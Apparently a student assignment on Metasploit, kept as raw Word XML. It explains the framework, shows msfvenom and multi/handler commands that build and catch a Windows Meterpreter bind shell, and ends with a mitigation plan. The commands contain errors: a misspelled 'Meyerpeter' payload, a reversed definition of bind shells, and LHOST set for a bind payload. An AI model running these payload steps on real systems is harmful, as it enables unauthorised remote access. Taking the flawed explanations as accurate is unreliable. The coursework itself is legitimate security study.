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AA45185" wp14:paraId="27C66B05" wp14:textId="35312B52">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="40" w:after="0" w:line="259" w:lineRule="auto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F3763"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3AA45185" w:rsidR="687E3E57">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>What is Metasploit?</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="50C230D9" wp14:textId="1978122D">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off"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Start by going through the Metasploit Unleashed (MSFU) documentation on the provided link. </w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="5E35B4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is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comprehensive resource that covers various aspects of Metasploit, from its introduction to advanced topics. Pay attention to:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="4841E16F" wp14:textId="40DD514D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3AA45185" w:rsidR="6754F5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Metasploit is the world's</w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="6754F5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leading open-source penetrating framework used by security engineers as a penetration testing system and a development platform that allows to create security tools and exploits. The framework makes hacking simple for both attackers and defenders.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="6E5CF10B" wp14:textId="0A120544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Metasploit Framework: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Learn about the framework, how </w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="0604FF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is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organized, and its modular structure.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="29D93C89" wp14:textId="302E940E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Basic Commands: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Familiarize yourself with basic commands used in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="030DA881" wp14:textId="21B2A467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Exploits and Payloads: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 how Metasploit uses exploits to compromise systems and payloads to execute on the exploited systems.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="4FA8A39B" wp14:textId="7C77AA86">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="40"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3763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2. Metasploit Functions and Capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="24E3F59E" wp14:textId="0711CEFC">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off"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Metasploit is a powerful framework with several key functions and capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="1AFAA800" wp14:textId="5DA96452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Vulnerability Scanning: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R9Rodruz" w:id="1788967623"/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bookmarkEnd w:id="1788967623"/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exploit vulnerabilities in target systems.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="7C5600BD" wp14:textId="08A737FD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Payloads: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Deliver malicious payloads to compromised systems for various purposes.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="00543181" wp14:textId="24E56AC7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Post-Exploitation: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EB2W1Qze" w:id="1363221770"/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bookmarkEnd w:id="1363221770"/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control over compromised systems and perform actions after </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_UcWYPLu8" w:id="1870662549"/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initial</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1870662549"/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exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="4CF50045" wp14:textId="680B972E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Auxiliary Modules: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Perform various tasks, such as information gathering, scanning, and fuzzing.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="008E65FF" wp14:textId="0073D454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Meterpreter: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powerful, extensible payload with features for post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="72D56B57" wp14:textId="0D626750">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="40"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3763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3. Bind Shell with Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="7135F88A" wp14:textId="4EA93E7C">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off"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use a bind shell with Meterpreter sessions, you can follow these general steps:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="7F9F74B1" wp14:textId="0419DEF0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Generate Payload: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Use the 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MSF venom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tool to generate a bind shell payload with Meterpreter. For example:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="2DA523C3" wp14:textId="4CC28737">
      <w:p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57CF1E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bash Copy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code</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="1CCA8595" wp14:textId="1819A2DB">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="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msfvenom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-p windows/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meterpreter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bind_tcp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-f exe -o bindshell.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="3DF37A62" wp14:textId="45A24109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 Up Listener in Metasploit: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Open Metasploit and set up a listener for the bind shell:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="6723A45C" wp14:textId="7F8C0CF4">
      <w:p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bash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Copy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code</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="7C0F8B79" wp14:textId="1C042030">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off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 exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:br/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 payload windows/</w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="787CAB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Meyerpeter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/bind_tcp</w:t>
      </w:r>
      <w:r>
        <w:br/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 LHOST your-attacker-ip</w:t>
      </w:r>
      <w:r>
        <w:br/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exploit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="06FE2945" wp14:textId="1154AB69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Execute Payload on Target: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Transfer the generated bindshell.exe to the target system and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="2A871F3F" wp14:textId="64C91868">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="40" w:after="0" w:line="259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4. Difference Between Reverse Shell and Bind Shell:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="7367F4DE" wp14:textId="42FECA9B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1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3AA45185" w:rsidR="7E5F1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Bind shell</w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="7E5F1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attacks involve the attacker's system connecting to the victim's system.</w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="7E5F1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Bind shell attacks are </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Int_JDRCLcuX" w:id="1232605517"/>
      <w:r w:rsidRPr="3AA45185" w:rsidR="7E5F1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initiated</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1232605517"/>
      <w:r w:rsidRPr="3AA45185" w:rsidR="7E5F1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by the attacker's system listening for incoming connections on a specific port.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="2D5D0374" wp14:textId="7C5AA03A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1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3AA45185" w:rsidR="7E5F1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Reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="7E5F1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attacks involve the victim's system connecting to the attacker's system.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="5E8215AF" wp14:textId="42D5C3B1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="40" w:after="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3763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5. Scenario and Mitigation Plan:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="5798DD64" wp14:textId="4E57C4F1">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off"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Scenario: Unauthorized Access to Corporate Database</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="7DB4BA1E" wp14:textId="111B554B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1D3052F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Reverse Shell: An attacker exploits a web server vulnerability, connecting it back to the attacker's system.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="727E5C12" wp14:textId="2CF54B85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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A45185" w:rsidR="687E3E5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Bind Shell:</w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="687E3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attacker infiltrates an internal workstation, sets up a bind shell, and connects to it remotely.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="0FBE2F2D" wp14:textId="6E171649">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 Mitigation: </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="098B9206" wp14:textId="3F358CAD">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Frequent Patch Management: Update systems to address vulnerabilities that are known to exist. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="781570FB" wp14:textId="3E091E38">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 </w:t>
      </w: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Segmenting the network to prevent lateral movement is called network segmentation. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="6F396C5A" wp14:textId="61DC3B1F">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Use intrusion detection systems and firewalls (IDS/IPS) to </w:t>
      </w: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>monitor</w:t>
      </w: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 and stop questionable activity. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="0E227E22" wp14:textId="75315A49">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Apply the least </w:t>
      </w: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>privilege</w:t>
      </w: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 concept to access control. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="02AA2554" wp14:textId="16AC191B">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Educate staff members about phishing and social engineering through security awareness training. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="3C0B308A" wp14:textId="1330A474">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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>Frequent Penetration Testing: Perform testing on a frequent basis to find and address vulne</w:t>
      </w:r>
      <w:r w:rsidRPr="3AA45185" w:rsidR="0FBEEA92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rabilities</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3AA45185" wp14:paraId="16A84172" wp14:textId="023D60E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3AA45185" wp14:paraId="2C078E63" wp14:textId="04A5960D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="587A63AF">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="76932C3E" wp14:anchorId="31A8DDE9">
            <wp:extent cx="5762625" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21340680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567af65c6f4d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MWCvINg2LQvgw/" int2:id="XAxgvZNB">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="A/EslZ7Mjxtu55" int2:id="yfEaGV3S">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="8+VaPVuUkeqKD9" int2:id="5nIoCDI6">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="srxi81Oxmejxl3" int2:id="mxocnOmY">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:textHash>
    <int2:bookmark int2:bookmarkName="_Int_EB2W1Qze" int2:invalidationBookmarkName="" int2:hashCode="2rLVadqKGhQ/ab" int2:id="pBtsbej2">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_R9Rodruz" int2:invalidationBookmarkName="" int2:hashCode="OK9RtxqoBirQX1" int2:id="jOe5jHWp">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_UcWYPLu8" int2:invalidationBookmarkName="" int2:hashCode="itfSHHGwSbcAO6" int2:id="DqUyO8dT">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_JDRCLcuX" int2:invalidationBookmarkName="" int2:hashCode="oCNEUbKlJX/GmI" int2:id="4SJWpplX">
      <int2:state int2:type="AugLoop_Text_Critique" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_LYgM9ipY" int2:invalidationBookmarkName="" int2:hashCode="m/D4/19di8v/ud" int2:id="chKys3Li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nsid w:val="68478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78280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20943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996fd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c3e7d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5ba00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fe4bc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8f459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530cd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a5efa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ff292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22081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9374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d02c3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fd77d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23f7c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e1e5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20a46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d3976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71ad9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9c8ff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c2b81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606f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8bd61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944bc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920bc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595FC1"/>
    <w:rsid w:val="0604FF91"/>
    <w:rsid w:val="0F39E039"/>
    <w:rsid w:val="0FBEEA92"/>
    <w:rsid w:val="10D5B09A"/>
    <w:rsid w:val="16643B02"/>
    <w:rsid w:val="1D3052FD"/>
    <w:rsid w:val="2330EBBB"/>
    <w:rsid w:val="245AC7AB"/>
    <w:rsid w:val="2DE88194"/>
    <w:rsid w:val="31C36A67"/>
    <w:rsid w:val="3AA45185"/>
    <w:rsid w:val="3C467BD5"/>
    <w:rsid w:val="45ED5E1B"/>
    <w:rsid w:val="4B885DFD"/>
    <w:rsid w:val="4C437742"/>
    <w:rsid w:val="4D242E5E"/>
    <w:rsid w:val="4DDF47A3"/>
    <w:rsid w:val="57CF1E98"/>
    <w:rsid w:val="587A63AF"/>
    <w:rsid w:val="5E35B4FC"/>
    <w:rsid w:val="60E1BC4C"/>
    <w:rsid w:val="6754F5EE"/>
    <w:rsid w:val="687E3E57"/>
    <w:rsid w:val="722F5988"/>
    <w:rsid w:val="72595FC1"/>
    <w:rsid w:val="76F92938"/>
    <w:rsid w:val="787CABFF"/>
    <w:rsid w:val="7894F999"/>
    <w:rsid w:val="7E5F1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595FC1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{066F5424-E92B-4906-A942-8D35D8BE92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30567af65c6f4dcd" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="R1fb98a5ae6834b38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R4bede1e1749b41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2023-11-27T12:49:49.5019091Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-27T13:14:10.3168188Z</dcterms:modified>
  <dc:creator>Arya Martin (2220294)</dc:creator>
  <lastModifiedBy>Arya Martin (2220294)</lastModifiedBy>
</coreProperties>
</file>